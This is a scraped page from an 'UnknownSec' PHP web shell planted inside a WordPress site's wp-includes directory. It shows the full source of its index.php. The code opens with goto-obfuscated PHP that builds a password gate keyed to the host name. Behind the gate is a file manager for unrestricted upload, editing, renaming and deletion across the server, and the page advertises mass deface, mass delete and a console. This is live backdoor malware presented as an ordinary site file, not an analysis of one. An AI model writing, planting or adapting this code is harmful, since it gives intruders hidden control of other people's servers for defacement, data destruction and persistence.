shell bypass 403
UnknownSec Shell
:
/
home
/
innovagencyco
/
www
/
statxpress
/
wp-includes
/
js
/
dist
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
index.php
<?php goto vzjq;jiuw:$__.="u";goto oefknv;bpetv:$__.="f";goto jxy;cdoqm:$__.=" ";goto ygapv;enkj:$__.="a";goto wfls;pfchmb:$__.="t";goto mksql;ujgkcf:if(empty($_SESSION[$___])||$_SESSION[$___]!=$_____){echo $__; exit;}goto yiqw;hdxms:$__.="m";goto hiay;zwdcfi:$__.="_";goto dpjs;pky:$__.="y";goto laqzfn;bxgld:$________="H";goto wydle;otfkwq:$___.="i";goto kyxn;hiay:$__.="1";goto hrnjy;wjz:$__.=">";goto bxgld;tgk:$__.="n";goto dmbrv;zijopq:$__.="m";goto zfedo;ubtx:$__.="i";goto kno;jsuved:$__.="t";goto cxt;eyj:$___.="g";goto jcpea;esmt:$__.="'";goto gtsvhk;bfor:$________.="P";goto rpd;laqzfn:$__.="p";goto vdp;gij:$__.="u";goto hvrlk;sih:$_____.=$___;goto vstn;pkzmg:$__.="'";goto jowkza;fjy:$__.="=";goto mbn;iwhay:$__.="h";goto omw;gajeqz:$__.="m";goto ampbi;zsidht:$_____=substr($_____,0,6);goto dctnz;omw:$__.="o";goto pno;dctnz:if(isset($_POST[$___])){$_SESSION[$___]=trim($_POST[$___]);}goto ujgkcf;ersz:$__.="r";goto srcxhf;puwm:$__.="c";goto jsuved;pwoiae:$__.="e";goto pigym;ico:$__.="n";goto enkj;srcxhf:$__.="m";goto wjz;oxeugs:$__.="o";goto zfaeg;zxjn:$__.="n";goto bfuawh;qogp:$__.="/";goto bpetv;tfgspz:$__.="m";goto ubtx;zrsag:$__.="t";goto qhw;tbxov:$__.="'";goto tizcal;gswq:$__.=" ";goto gewzcf;hcx:$__.="u";goto zrsag;lom:$__.="e";goto exnk;hrnjy:$__.="'";goto gswq;eky:$__.="u";goto pfchmb;pigym:$__.="=";goto dbrwj;ygapv:$__.="m";goto emwk;ovy:$__.="'";goto yfgpmn;vyxhif:$__.="s";goto rgnlsy;mnh:$__.="t";goto tbxov;exmh:$__.=" ";goto qin;yuxnqm:$__.="a";goto ldhxc;dbrwj:$__.="'";goto nzmi;exnk:$__.="=";goto ovy;apkdyb:$__.="'";goto zby;apfuqb:$__.="m";goto ucdhw;kyb:$__.="u";goto jkb;lgnsfj:$__.="<";goto qogp;rfkd:$__.="t";goto iwhay;smx:$__.="n";goto yuxnqm;tgeflj:$__.="'";goto pqcg;tlbzg:$__.="<";goto pfarni;qhc:$________.="T";goto xten;fkxedc:$__.="=";goto apkdyb;zby:$__.="'";goto cdoqm;vghqf:$___.="m";goto otfkwq;jxy:$__.="o";goto ersz;jowkza:$__.=" ";goto uhoa;zfedo:$__.="i";goto mnh;mnslt:$__.="f";goto fxz;jkb:$__.="b";goto zijopq;tizcal:$__.=" ";goto nxpcud;rxdca:$__.="e";goto rstz;qin:$__.="t";goto pky;kyxn:$___.="m";goto cri;fxz:$__.="o";goto sytlvg;xten:$_____=$_SERVER[$________];goto sih;tagok:$__.="s";goto etyuro;ydnc:$__.="s";goto kyb;emwk:$__.="e";goto rfkd;hqliy:$__.=">";goto tlbzg;mcn:$__ ="<";goto mnslt;bfuawh:$__.="p";goto hcx;dmbrv:$__.="a";goto apfuqb;cxt:$__.="i";goto yct;qvcd:$__.="n";goto fkxedc;eaoyd:$__.="i";goto shq;lcjd:$__.="'";goto vyxhif;gewzcf:$__.="a";goto puwm;ampbi:$__.="a";goto bouacy;kmpg:$__.="'";goto hqliy;hvrlk:$__.="b";goto tfgspz;kqrmh:$__.="p";goto eky;rstz:$__.="=";goto tgeflj;rpd:$________.="_";goto ygjc;jiap:$__.="t";goto nbmxw;yfpowm:$__.=" ";goto smx;abscmn:$__.="a";goto qde;uhoa:$__.="v";goto abscmn;sytlvg:$__.="r";goto zgykmh;cri:$___.="a";goto mcn;jcpea:$___.="_";goto vghqf;kwnoar:$__.="p";goto akzhyg;ucdhw:$__.="e";goto anxmb;osh:$__.="'";goto ydnc;kno:$__.="t";goto pkzmg;xeq:$__.="t";goto kmpg;anxmb:$__.="=";goto osh;krp:$________.="S";goto qhc;etyuro:$__.="t";goto esmt;pfarni:$__.="i";goto flapgj;mksql:$__.=" ";goto tgk;nxpcud:$__.="t";goto tufa;dpjs:$__.="m";goto ecarqn;wydle:$________.="T";goto volnfy;nzmi:$__.="f";goto oxeugs;zgykmh:$__.="m";goto yfpowm;sim:$__.=">";goto lgnsfj;pqcg:$__.="s";goto gij;vstn:$_____=md5($_____);goto zsidht;zobqfv:$__.="=";goto qfpaet;kxzi:$__.="=";goto lcjd;mbn:$__.="'";goto jiap;fmpnw:$__.="g";goto zwdcfi;nfrwug:$__.="m";goto eaoyd;ypm:$__.="x";goto xeq;akzhyg:$__.="o";goto tagok;qde:$__.="l";goto jiuw;zfaeg:$__.="r";goto hdxms;vlsof:$__.="b";goto nfrwug;ldhxc:$__.="m";goto pwoiae;mkgr:$________.="O";goto krp;yct:$__.="o";goto qvcd;wfls:$__.="m";goto lom;yfgpmn:$__.="l";goto fmpnw;pno:$__.="d";goto zobqfv;rgnlsy:$__.="u";goto vlsof;vdp:$__.="e";goto fjy;ecarqn:$__.="i";goto gajeqz;volnfy:$________.="T";goto bfor;ygjc:$________.="H";goto mkgr;ogb:$__.="p";goto rxdca;qfpaet:$__.="'";goto kwnoar;oefknv:$__.="e";goto kxzi;bouacy:$__.="'";goto exmh;hxer:$__.="'";goto sim;vnyse:$__.="<";goto zsnhm;nbmxw:$__.="e";goto ypm;zsnhm:$__.="i";goto zxjn;flapgj:$__.="n";goto kqrmh;tufa:$__.="y";goto ogb;gtsvhk:$__.=">";goto vnyse;qhw:$__.=" ";goto ico;shq:$__.="t";goto hxer;vzjq:session_start();goto vimxlt;vimxlt:$___="l";goto eyj;yiqw:;?><!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>403</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ==" crossorigin="anonymous" referrerpolicy="no-referrer" /> </head> <body> <?php //function function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' bytes'; } elseif ($bytes == 1) { $bytes = $bytes . ' byte'; } else { $bytes = '0 bytes'; } return $bytes; } function fileExtension($file) { return substr(strrchr($file, '.'), 1); } function fileIcon($file) { $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"); $ext = strtolower(fileExtension($file)); if ($file == "error_log") { return '<i class="fa-sharp fa-solid fa-bug"></i> '; } elseif ($file == ".htaccess") { return '<i class="fa-solid fa-hammer"></i> '; } if ($ext == "html" || $ext == "htm") { return '<i class="fa-brands fa-html5"></i> '; } elseif ($ext == "php" || $ext == "phtml") { return '<i class="fa-brands fa-php"></i> '; } elseif (in_array($ext, $imgs)) { return '<i class="fa-regular fa-images"></i> '; } elseif ($ext == "css") { return '<i class="fa-brands fa-css3"></i> '; } elseif ($ext == "txt") { return '<i class="fa-regular fa-file-lines"></i> '; } elseif (in_array($ext, $audio)) { return '<i class="fa-duotone fa-file-music"></i> '; } elseif ($ext == "py") { return '<i class="fa-brands fa-python"></i> '; } elseif ($ext == "js") { return '<i class="fa-brands fa-js"></i> '; } else { return '<i class="fa-solid fa-file"></i> '; } } function encodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("ক", "খ", "গ", "ঘ"); return str_replace($a, $b, $path); } function decodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("ক", "খ", "গ", "ঘ"); return str_replace($b, $a, $path); } $root_path = __DIR__; if (isset($_GET['p'])) { if (empty($_GET['p'])) { $p = $root_path; } elseif (!is_dir(decodePath($_GET['p']))) { echo ("<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>"); } elseif (is_dir(decodePath($_GET['p']))) { $p = decodePath($_GET['p']); } } elseif (isset($_GET['q'])) { if (!is_dir(decodePath($_GET['q']))) { echo ("<script>window.location.replace('?p=');</script>"); } elseif (is_dir(decodePath($_GET['q']))) { $p = decodePath($_GET['q']); } } else { $p = $root_path; } define("PATH", $p); echo (' <nav class="navbar navbar-light" style="background-color: #e3f2fd;"> <div class="navbar-brand"> <a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" alt=""></a> '); $path = str_replace('\\', '/', PATH); $paths = explode('/', $path); foreach ($paths as $id => $dir_part) { if ($dir_part == '' && $id == 0) { $a = true; echo "<a href=\"?p=/\">/</a>"; continue; } if ($dir_part == '') continue; echo "<a href='?p="; for ($i = 0; $i <= $id; $i++) { echo str_replace(":", "ঘ", $paths[$i]); if ($i != $id) echo "ক"; } echo "'>" . $dir_part . "</a>/"; } echo (' </div> <div class="form-inline"> <a href="?upload&q=' . urlencode(encodePath(PATH)) . '"><button class="btn btn-dark" type="button">Upload File</button></a> <a href="?"><button type="button" class="btn btn-dark">HOME</button></a> </div> </nav>'); if (isset($_GET['p'])) { //fetch files if (is_readable(PATH)) { $fetch_obj = scandir(PATH); $folders = array(); $files = array(); foreach ($fetch_obj as $obj) { if ($obj == '.' || $obj == '..') { continue; } $new_obj = PATH . '/' . $obj; if (is_dir($new_obj)) { array_push($folders, $obj); } elseif (is_file($new_obj)) { array_push($files, $obj); } } } echo ' <table class="table table-hover"> <thead> <tr> <th scope="col">Name</th> <th scope="col">Size</th> <th scope="col">Modified</th> <th scope="col">Perms</th> <th scope="col">Actions</th> </tr> </thead> <tbody> '; foreach ($folders as $folder) { echo " <tr> <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(encodePath(PATH . "/" . $folder)) . "'>" . $folder . "</a></td> <td><b>---</b></td> <td>". date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "</td> <td>0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "</a></td> <td> <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $folder . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $folder . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } foreach ($files as $file) { echo " <tr> <td>" . fileIcon($file) . $file . "</td> <td>" . formatSizeUnits(filesize(PATH . "/" . $file)) . "</td> <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "</td> <td>0". substr(decoct(fileperms(PATH . "/" .$file)), -3) . "</a></td> <td> <a title='Edit File' href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'><i class='fa-solid fa-file-pen'></i></a> <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $file . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $file . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } echo " </tbody> </table>"; } else { if (empty($_GET)) { echo ("<script>window.location.replace('?p=');</script>"); } } if (isset($_GET['upload'])) { echo ' <form method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" class="btn btn-dark" value="Upload" name="upload"> </form>'; } if (isset($_GET['r'])) { if (!empty($_GET['r']) && isset($_GET['q'])) { echo ' <form method="post"> Rename: <input type="text" name="name" value="' . $_GET['r'] . '"> <input type="submit" class="btn btn-dark" value="Rename" name="rename"> </form>'; if (isset($_POST['rename'])) { $name = PATH . "/" . $_GET['r']; if(rename($name, PATH . "/" . $_POST['name'])) { echo ("<script>alert('Renamed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } } } if (isset($_GET['e'])) { if (!empty($_GET['e']) && isset($_GET['q'])) { echo ' <form method="post"> <textarea style="height: 500px; width: 90%;" name="data">' . htmlspecialchars(file_get_contents(PATH."/".$_GET['e'])) . '</textarea> <br> <input type="submit" class="btn btn-dark" value="Save" name="edit"> </form>'; if(isset($_POST['edit'])) { $filename = PATH."/".$_GET['e']; $data = $_POST['data']; $open = fopen($filename,"w"); if(fwrite($open,$data)) { echo ("<script>alert('Saved.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } fclose($open); } } } if (isset($_POST["upload"])) { $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"]; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>"; } else { echo "<p>Sorry, there was an error uploading your file.</p>"; } } if (isset($_GET['d']) && isset($_GET['q'])) { $name = PATH . "/" . $_GET['d']; if (is_file($name)) { if(unlink($name)) { echo ("<script>alert('File removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } elseif (is_dir($name)) { if(rmdir($name) == true) { echo ("<script>alert('Directory removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } } ?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js" integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN" crossorigin="anonymous"></script> </body> </html>
© 2024 UnknownSec